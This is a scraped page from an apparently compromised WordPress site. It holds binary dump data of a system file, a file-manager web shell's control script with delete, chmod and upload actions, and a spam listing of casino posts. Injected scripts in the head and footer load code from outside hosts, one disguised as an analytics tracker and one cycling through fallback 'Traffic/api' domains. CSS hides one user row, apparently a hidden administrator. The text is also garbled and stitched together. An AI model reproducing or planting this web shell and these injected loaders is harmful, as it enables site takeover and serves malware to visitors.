�0 �  �3�0 �  � &#039;�1 �!�0 �!�0 �!�0 �#��0 �%�0 �%�1 �&amp;�0 �&amp;�0 �&#039;�0 �&#039;�0 �&#039;T�0 �(�0 �(��0 �*�1 �+�0 �+��1 �-�0 �-�1 �.��1 ��JM  ��~6� ^� �� ��� �� �� �� �� �  �� �� �� �� �m� �(� �	� �
� �
� �s� ��� ��� ��J    ��U��
 �� �� �� �� ��
 �� ��� ��
 ��
 �� �)� �	� �	}� ��-  ��sp�	 �  ���	 ��  ��m��  �� �  �� �� �� �� ��  �	�� ��� �� �b  ��� ��  ��� ��  �*� �  �� %C &gt;  ��[@  o�	 �  ��	 ��	 �I�	 ��	 ��	 ��	 ��	 ��	 ��	 �  ��	 ��	 �o�	 ��B /  ��E�
  �� �  �� ��  ��]v� �� ��  �� �  �� �J� ��� �r  ��� �  ��� �  �q� �� �                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                pf      0f       r                             �                     h       �                           �                           �                           �                          s                          �                          �                          �                     p       �                     p       �                     x       �                           �                           �                                                q       
                    	                          	      �                    
      9                          &gt;                           P                                                          �     ��������        `�      G     ����          `�      !     ����           ��      S     ����           ��      Z     ����           p     a     ����           А      l                   ��      |                   `�      N     ����           `�      �                   �      �                   �      �                   �      �                   �           ����           `�      �     ����           p�      �     ����           `�                                           �     �     �                                     �     }     �                                                 �            pK            �K            �K             L                            �            �            �            �                         (L     @        L     �       +            HL            @            hL            .
             G
             U
             �
              @             �	            �q                          �q                   ���o    �             (             �      
       �
                                          �z                                       @+             h!             �	      	                             ���o          ���o    x       ���o           �o          ���o    ^                                                                                       �x                     0@      @@      P@      `@      p@      �@      �@      �@      �@      �@      �@      �@      �@       A      A       A      0A      @A      PA      `A      pA      �A      �A      �A      �A      �A      �A      �A      �A       B      B       B      0B      @B      PB      `B      pB      �B      �B      �B      �B      �B      �B      �B      �B       C      C       C      0C      @C      PC      `C      pC      �C      �C      �C      �C      �C      �C      �C      �C       D      D       D      0D      @D      PD      `D      pD      �D      �D      �D      �D      �D      �D      �D      �D       E      E       E      0E      @E      PE      `E      pE      �E      �E      �E      �E      �E      �E      �E      �E       F      F       F      0F      @F      PF      `F      pF      �F      �F      �F      �F      �F      �F      �F      �F       G      G       G      0G      @G      PG      `G      pG      �G      �G      �G      �G      �G      �G      �G      �G       H      H       H      0H      @H      PH      `H      pH      �H      �H      �H      �H      �H      �H      �H      �H       I      I       I      0I      @I      PI      `I      pI      �I      �I      �I      �I      �I      �I      �I      �I       J      J       J      0J                                                                                  @�     �g                      P�     `g                      ��     @g                      x�      g                      p�      g                      ��     �f                      ��     �f              bootctl-252-67.el9_8.4.alma.1.x86_64.debug  u{�7zXZ  �ִF !   t/���f] ?�E�h=��ڊ�2N���~ ��KMoة�L&#039;ԟ�$��߾o4�2P��&gt;��ͷ� fZ�O9�З���\��(��,��05�~x�	�B1ͺ��.E���S%� �b��:WL���q5ܫ���Ў�X����r�W~�E�#(pϰ,蟲7M�|�s�*�v�&quot;�7�(J	�v�w N���&amp;��4��= �4 i���	L�9v���̹�PC^j�]1N�zVgdѫ]�2�W(y/��c@�0y�5\�޹�fC�K�2-64���{5�vg��-}0��v-��(NW��&quot;�;+�`�q���g7���d�P�E�2��C��� �kH��Ȣ�Ggqi��|�Xtqx�9����B
����%?o{���J����s,�&gt;��rO��� y:��a�����x��\|[��ְmj|g9{6�`�9�*X�zA!��L�T���Pq�0���ø� �e�p�$�5��n}i&lt;�T����%�O1}��i�Xy�&#039;�7w�ƹ�Z}�B�o�i�5az`#١�&quot;\߂l�Q=�smZ�d�CB��a��Y�rR�U�[f�Y�l�U޹����.r.Bz���{ee�G^1ܜv��Ơ�rS�ump D�iyП���&amp;H}�tg��-W��-�QT�;&quot;��qn�+��Ph�Շ$�V�.�D��I�]��ۇh��ؚ��$|�#��!h������$9��#��7Q���[d	\ xk���A/&quot;�q�0Nh����cD���E�&lt;ZOϯ�ߩ�G���{�����`*Ò�&amp;! Mcx0$H��;��@�&amp;�S��BZl�]����E��KM��K:�uM玃���2ޖ��9��@k���;EJ�5�[T[��|�ȇJ�Ǉ��oḁ���� �a��]�R���q|�Ƶb�9
o&quot;
E�&quot;����d��8�� ���ʞ]��🋹[N]��&lt;ǫU���&gt;!��&gt;��v�m/�$�d��˚��˝�����2[&#039;Þ��L��G��+��?�qqp#����bp�&#039;Q�2A�&lt;�.M�7Cf��b�;��	M�c&amp;V�e�&lt;�H�m�@Ü�z Mf���bO ���~�[u�蠂&gt;T�-�M9��� 	�e�!�PP-ƿl�����6��O7j�ACL�j!�W�Bݗ�Ѫl�,��0����0�@�).(�ɻ��WQX�����z��u�U/&quot;&amp;��A�p�#�� Bubx�$�(n�b�8l,��8�ih�(F�CҢ9#���?*G��յ&gt;�[C�TP��3;*�xV(����0�M���X/�-���劕���22&lt;�&lt;虻.&lt;�V���s��!|q�&quot;6�
+~�F�9u�������+�/����)F&gt;�瑄��`܁�U���Xwt�jr���+u �Y� ��MT�@��[�\ӱ�U&#039;��A;U������rH��CJf������ʙ�L�����.���;X�F�O��C�2 p�{`K���`Zkn�=���پ�a��&quot;�rd}�6̚�BR�N���=��Y��a0R������b�gf�����%���9p���,H]�[	sC=�bU*��f}����):�nH&#039;�5t-���\��FS�t[va_$���x�.\�W~OcH���:.&amp;]u��ǣ/l�����@�\�&#039;�[d�eR�ئ���o	y�����J�Q�Z!n�ж&quot;�l�68w 8P�/ؼ��@Pl���}�}^�4�M6����x�bR�%���L��Gw�9DO|f��e�a��u���r��u�?�*~�V��&#039;���F7_t��x�T�EMZt��}bt�&amp;~eQ���crD�X�3o����ݕ�vĶ��R,&amp;7��I������������@��   !��`J� ��=  ��-��g�    YZ .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .gcc_except_table .init_array .fini_array .data.rel.ro .dynamic .got .data SYSTEMD_STATIC_DESTRUCT .bss .gnu_debuglink .gnu_debugdata                                                                                                                                           8      8      0                              &amp;             h      h      $                              9             �      �                                     G   ���o       �      �      &lt;                             Q             �      �      8                          Y             (      (      �
                             a   ���o                   Z                           n   ���o       x       x       �                            }             h!      h!      �	                           �      B       @+      @+                                �              @       @                                    �              @       @       
                            �             @J      @J      
                            �             PT      PT      ��                             �             �	     �	                                   �                          C                             �              S      S     �                             �             �U     �U                                  �             �e     �e     �                             �             �q     �q                                  �             �q     �q                                  �              r      r     �                                          �x     �x                                             �z     �z     H                                         �      �                                               �     �     �                              /             �     ��     �                               4                     ��     0                              C                     (�     �                                                   Ј     R                             </textarea>
                    <div style="margin-top:15px;display:flex;gap:8px;">
                        <button class="button button-green">Save</button>
                        <a href="?p=%2Fusr%2Fbin" class="button button-red">Cancel</a>
                    </div>
                </form>
            </div>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/usr/bin';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic &#8211; Página: 2</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//nornikal3pi12.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a8911b297fec*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://nornikal3pi12.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog paged wp-embed-responsive paged-2 wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/bdm-bet-casino-fastpaced-slots-live-games-and-quic/">BDM Bet Casino: Fast‑Paced Slots, Live Games and Quick Wins</a></h2><p>For players who thrive on adrenaline and instant gratification, BDMBet offers a gaming ecosystem built around short, high‑intensity sessions. The platform’s design prioritizes rapid game access and swift payout cycles, allowing enthusiasts to jump straight into action without cumbersome onboarding. Seamless Entry: From Welcome Bonus to Play The first touchpoint is the welcome offer—up to [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/top-rated-casino-daily-deals-a-comprehensive-guide/">Top Rated Casino Daily Deals: A Comprehensive Guide</a></h2><p>As a seasoned online casino player with 15 years of experience, I have spent countless hours exploring the world of online roulette and casino games. In this article, I will delve into the world of top-rated casino daily deals, providing you with up-to-date information, statistics, and tips to enhance your gaming experience. Whether you are [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/the-ultimate-guide-to-slots-machine/">The Ultimate Guide to Slots Machine</a></h2><p>Slots machine, also known as slot machines, is one of the most popular casino games both online and offline. With their colorful graphics, exciting sound effects, and potential for big wins, slots machine attract players from all over the world. In this comprehensive guide, I will delve into the world of slots machine, covering everything [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/ruletka-darmowe-spiny-kasyno-poradnik-dla-graczy/">Ruletka darmowe spiny kasyno: Poradnik dla graczy</a></h2><p>Wprowadzenie do ruletki darmowe spiny kasyno Ruletka darmowe spiny kasyno to popularna gra kasynowa, która przyciąga zarówno doświadczonych graczy, jak i nowicjuszy. Gra polega na obstawianiu numerów, kolorów lub grup numerów https://waszemazury.pl na stole do ruletki, a następnie zakręceniu kołem. Darmowe spiny to bonusy, które pozwalają graczom na darmowe zakręcenie kołem, zwiększając szansę na wygraną. [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/i-am-gavin-lucas-a-betting-lover-having-a-particular-fascination-with-films-slots-and-you-can-alive-online-casino-games/">I am Gavin Lucas, a betting lover having a particular fascination with films slots and you can alive online casino games</a></h2><p>Whether you are commuting, waiting in-line https://nl-one-casino.nl/nl/promotiecode/ , otherwise leisurely yourself, you have access to the same large-high quality video game and large incentives available on desktop computer. If you signup at this local casino, don&#8217;t neglect to allege your own anticipate added bonus. All of the this new member can very quickly subscribe, allege [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/%d0%b4%d0%be%d0%b3%d0%bb%d1%8f%d0%b4-%d0%b7%d0%b0-%d1%88%d0%b5%d1%80%d1%81%d1%82%d1%8e-%d0%bc%d0%b8%d1%81%d0%bb%d0%b8%d0%b2%d1%81%d1%8c%d0%ba%d0%be%d1%97-%d1%81%d0%be%d0%b1%d0%b0%d0%ba%d0%b8-%d0%bf/">Догляд за шерстю мисливської собаки після лісу</a></h2><p>Догляд за шерстю мисливської собаки після лісу є важливим етапом у забезпеченні здоров&#8217;я та добробуту вашого чотирилапого друга. Мисливські собаки, які активно працюють у лісі, https://petguide.in.ua піддаються впливу різноманітних факторів, які можуть негативно вплинути на стан їхньої шерсті. Після кожного виходу на полювання варто звертати особливу увагу на догляд за шерстю, щоб уникнути можливих проблем [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/roulette-with-daily-promotions-usa-fast-an-expert-review/">Roulette with Daily Promotions USA Fast: An Expert Review</a></h2><p>When it comes to online casinos, roulette is a classic game that never goes out of style. With the added excitement of daily promotions, players in the USA can enjoy fast-paced action and great rewards. In this expert review, we will explore the world of roulette with daily promotions at top online casinos, based on [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/trusted-crypto-casino-online-a-comprehensive-review/">Trusted Crypto Casino Online: A Comprehensive Review</a></h2><p>As a seasoned online casino player with 17 years of experience, I have seen the industry evolve and change over the years. One of the most significant developments in recent years has been the rise of trusted crypto casinos online. These innovative online casinos offer players the opportunity to play their favorite casino games using [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/pacanele-gratis-jocuri-aproape-aparate-online/">Păcănele Gratis Jocuri aproape Aparate Online</a></h2><p>Content Cân câștigi la Wild Walker Betano Casino — Gamă uriașă ş jocuri și retrageri foarte rapide Zinx Casino — Reîncărcări săptămânale ce 50 ş rotiri gratuite Vei găsi acest dans acolea să multe alte pacanele geab, totul de un click distanță. B este trebuincios ş te înregistrezi au să depui bani, ci nici nu [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/the-ultimate-guide-to-live-roulette-real-money-play/">The Ultimate Guide to Live Roulette Real Money Play</a></h2><p>Are you a fan of the thrill of live casino games? Do you enjoy the excitement of roulette and the chance to win real mini-roulette.net/ money? If so, then live roulette real money play is the perfect choice for you. In this comprehensive guide, we will explore everything you need to know about playing live</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"><a href="https://pblmedic.com/?edit=1&#038;p=%2Fusr%2Fbin&#038;path=%2Fusr%2Fbin%2Fbootctl" ><span class="meta-nav">&larr;</span> anterior</a></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/3/?edit=1&#038;p=%2Fusr%2Fbin&#038;path=%2Fusr%2Fbin%2Fbootctl" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
